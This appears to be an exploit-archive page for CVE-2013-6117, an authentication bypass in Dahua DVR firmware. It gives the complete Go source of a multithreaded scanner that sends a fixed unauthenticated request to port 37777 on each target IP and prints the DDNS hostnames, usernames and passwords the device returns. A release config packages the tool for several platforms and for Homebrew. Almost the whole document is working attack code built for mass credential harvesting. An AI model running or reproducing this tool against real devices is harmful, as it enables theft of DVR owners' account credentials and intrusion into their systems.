CVE-2013-6117_Dahua_DVR_2.608.0000.0_and_2.608.GV00.0_身份驗證繞過漏洞

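# CVE-2013-6117 Dahua DVR 2.608.0000.0 and 2.608.GV00.0 身份驗證繞過漏洞

The program below connects to TCP port 37777 on each target, sends one fixed request without logging in, and prints one line per DDNS entry found in the reply, in the form `target|ddns-host:port|username|password`.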
==Usage==

$ ./CVE-2013-6117 -h
Options:

  -h, --help       display help information
  -f, --filename   File containing list of IP addresses
  -t, --target     Target IP
  -n, --threads    No of concurrent threads (default: 100)
$ ./CVE-2013-6117 -f hostfile.txt 
1.2.4.4|name.no-ip.org:80|username|password
$ ./CVE-2013-6117 -t 1.2.3.4
1.2.4.4|name.no-ip.org:80|username|password

==CVE-2013-6117.go==

package main
import (
    "net"
    "os"
    "strings"
    "fmt"
    "sync"
    "bufio"
    "time"
    "github.com/mkideal/cli"
)
// readLines returns the contents of the file at path split into lines.
//
// Lines are returned exactly as bufio.Scanner yields them (line terminators
// stripped, blank lines kept). If the file cannot be opened the open error is
// returned with a nil slice; a scanning error is returned together with the
// lines collected up to that point.
func readLines(path string) ([]string, error) {
	fh, openErr := os.Open(path)
	if openErr != nil {
		return nil, openErr
	}
	defer fh.Close()

	var collected []string
	sc := bufio.NewScanner(fh)
	for {
		if !sc.Scan() {
			// Scan stops on EOF or on error; Err is nil for plain EOF.
			return collected, sc.Err()
		}
		collected = append(collected, sc.Text())
	}
}
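// getData scans a raw reply received from servAddr for the three DDNS
// sections this tool knows about (G4-IP, NO-IP and Dyndns, in that order) and
// prints one line per section that carries a non-empty user name:
//
//	servAddr|host:port|username|password
//
// A reply that lacks a marker, or whose section holds fewer than five
// "&&"-separated fields, is skipped. The previous code indexed fields 3 and 4
// unconditionally, so a short or truncated reply caused an index-out-of-range
// panic that took down every worker goroutine.
//
// The printed fields are copied verbatim from the remote reply. They are
// device-controlled text and may contain control characters or extra "|"
// separators, so anything that consumes this output should treat it as
// untrusted. The reply is returned by the device without a login (see
// connect), which is why the account data in it has to be considered exposed
// on any device that answers.
func getData(servAddr string, data string) {
	for _, marker := range []string{"&&G4-IP DDNS&&", "&&NO-IP DDNS&&", "&&Dyndns DDNS&&"} {
		if line, ok := ddnsLine(servAddr, data, marker); ok {
			fmt.Println(line)
		}
	}
}

// ddnsLine extracts the section that follows the first occurrence of marker
// in data and formats it as an output line. ok is false when the marker is
// absent, the section is too short, or the user name is empty.
func ddnsLine(servAddr, data, marker string) (line string, ok bool) {
	sections := strings.Split(data, marker)
	if len(sections) < 2 {
		return "", false
	}
	// Only the text between the first and the second occurrence of the marker
	// is considered, as in the original implementation.
	fields := strings.Split(sections[1], "&&")
	if len(fields) < 5 {
		return "", false
	}
	// fields[2] is not used by this tool.
	host, port, user, pass := fields[0], fields[1], fields[3], fields[4]
	if user == "" {
		return "", false
	}
	return servAddr + "|" + host + ":" + port + "|" + user + "|" + pass, true
}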
// connect is the worker loop: it takes addresses from urlChan until the
// channel is closed and, for each one, opens a TCP connection to port 37777,
// writes one fixed request (it contains the ASCII string "config"), reads a
// single reply of up to 1024 bytes and hands it to getData.
//
// No login exchange precedes the request. On the wire the whole interaction
// is one inbound TCP connection to port 37777 whose first payload is this
// request, which is what a network monitor or a port-37777 filter in front
// of the device would see.
//
// Every failure (resolve, dial, write, read) is silently skipped and the
// worker moves on to the next address.
func connect(urlChan chan string) {
	const request = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	const dialTimeout = 5 * time.Second

	for servAddr := range urlChan {
		endpoint := servAddr + ":37777"

		// The resolved address itself is not used; a resolution failure only
		// decides whether the dial is attempted.
		if _, resolveErr := net.ResolveTCPAddr("tcp", endpoint); resolveErr != nil {
			continue
		}

		// The dialer timeout bounds the connection attempt only; the Write
		// and Read below carry no deadline.
		dialer := net.Dialer{Timeout: dialTimeout}
		conn, dialErr := dialer.Dial("tcp", endpoint)
		if dialErr != nil {
			continue
		}

		if _, writeErr := conn.Write([]byte(request)); writeErr == nil {
			buf := make([]byte, 1024)
			if _, readErr := conn.Read(buf); readErr == nil {
				// The whole 1024-byte buffer is converted, including any
				// bytes the single Read did not fill.
				getData(servAddr, string(buf))
			}
		}
		conn.Close()
	}
}
// argT holds the command-line options, declared through struct tags for the
// github.com/mkideal/cli package.
type argT struct {
	// Embedded helper from the cli package; the usage text above shows the
	// resulting -h/--help option.
	cli.Helper
	// -f/--filename: path of a file with one address per line (read by readLines in main).
	Filename string `cli:"f,filename" usage:"File containing list of IP addresses"`
	// -t/--target: a single address, appended to the list after any file entries.
	Targetip string `cli:"t,target" usage:"Target IP"`
	// -n/--threads: number of worker goroutines. The default of 100 mentioned in
	// the usage text is applied in main, which keeps it when this value is not positive.
	Threads int  `cli:"n,threads" usage:"No of concurrent threads (default: 100)"`
}

// main parses the command line, builds the list of addresses from the
// optional host file and the optional single target, then fans the list out
// to a fixed pool of connect workers over an unbuffered channel and waits
// for all of them to finish.
//
// The value returned by cli.Run is not inspected, so the worker pool is
// started (and immediately drained) even when no address was supplied.
func main() {
	workers := 100 // default pool size, overridden by -n when positive
	var targets []string

	cli.Run(new(argT), func(ctx *cli.Context) error {
		opts := ctx.Argv().(*argT)

		if opts.Filename != "" {
			if lines, readErr := readLines(opts.Filename); readErr != nil {
				// A host file that cannot be read is reported and otherwise ignored.
				fmt.Println(readErr)
			} else {
				for _, raw := range lines {
					if host := strings.TrimSpace(raw); host != "" {
						targets = append(targets, host)
					}
				}
			}
		}
		if opts.Threads > 0 {
			workers = opts.Threads
		}
		if opts.Targetip != "" {
			targets = append(targets, opts.Targetip)
		}
		return nil
	})

	queue := make(chan string)
	var pool sync.WaitGroup
	for w := 0; w < workers; w++ {
		pool.Add(1)
		go func() {
			defer pool.Done()
			connect(queue)
		}()
	}

	// Feed every address to the workers; closing the channel ends their loops.
	for _, host := range targets {
		queue <- host
	}
	close(queue)
	pool.Wait()
}

==goreleaser.yml==

# Release configuration: builds the single-file program for every
# OS/architecture pair listed below.
build:
  main: ./CVE-2013-6117.go
  goos:
    - linux
    - darwin
    - windows
  goarch:
    - 386
    - amd64
    - arm
    - arm64
# Homebrew formula settings: repository milo2012/homebrew-tap, folder Formula.
brew:
  github:
    owner: milo2012
    name: homebrew-tap
  folder: Formula
